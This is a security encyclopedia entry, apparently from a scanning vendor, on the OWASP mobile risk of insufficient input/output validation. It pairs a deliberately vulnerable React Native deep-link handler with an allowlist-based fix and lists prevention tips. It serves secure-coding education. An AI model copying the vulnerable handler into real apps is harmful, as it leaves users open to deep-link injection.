保護DataHogo
Security Encyclopedia/OWASP Mobile Top 10
mediumCWE-20M4:2024

Insufficient Input/Output Validation

Mobile apps that don't validate user input or sanitize output are vulnerable to injection attacks, data corruption, and unexpected behavior.

How It Works

Mobile apps receive input from many sources: text fields, deep links, QR codes, clipboard, and inter-app communication. Without validation, malicious input can cause SQL injection in local databases, XSS in WebViews, path traversal in file operations, or crashes from malformed data. Output validation is equally important — displaying unsanitized data in WebViews can execute arbitrary JavaScript.

Vulnerable Code
// Deep link handler without validation
Linking.addEventListener('url', ({ url }) => {
  const path = new URL(url).pathname;
  navigation.navigate(path);
});
Secure Code
// Deep link handler with validation
const ALLOWED_ROUTES = ['/home', '/profile', '/settings'];
Linking.addEventListener('url', ({ url }) => {
  const path = new URL(url).pathname;
  if (ALLOWED_ROUTES.includes(path)) {
    navigation.navigate(path);
  }
});

Real-World Example

A 2021 vulnerability in the TikTok Android app allowed attackers to craft deep links that could steal user sessions. The app didn't validate deep link parameters, enabling JavaScript injection through a WebView component.

How to Prevent It

  • Validate all input from deep links, QR codes, and intents
  • Sanitize data before displaying in WebViews
  • Use allowlists for navigation routes
  • Validate data types and ranges on all user input

Affected Technologies

MobileReact NativeFlutter

Data Hogo detects this vulnerability automatically.

Scan Your Repo Free

Related Vulnerabilities

Improper Credential Usage

critical

Hardcoded API keys, passwords, or tokens directly in mobile app source code — easily extracted by decompiling the app bundle.

CWE-798M1:2024

Mobile Supply Chain Security

medium

Vulnerable SDKs, outdated native libraries, or compromised third-party modules in your mobile app introduce security risks from your dependencies.

CWE-1395M2:2024

Insecure Authentication/Authorization

high

Mobile apps with weak authentication — storing sessions insecurely, missing token refresh, or authorization checks only on the client side.

CWE-287M3:2024

Insecure Communication

high

Mobile app transmits sensitive data over HTTP instead of HTTPS, or accepts invalid SSL certificates — enabling man-in-the-middle attacks on public WiFi.

CWE-319M5:2024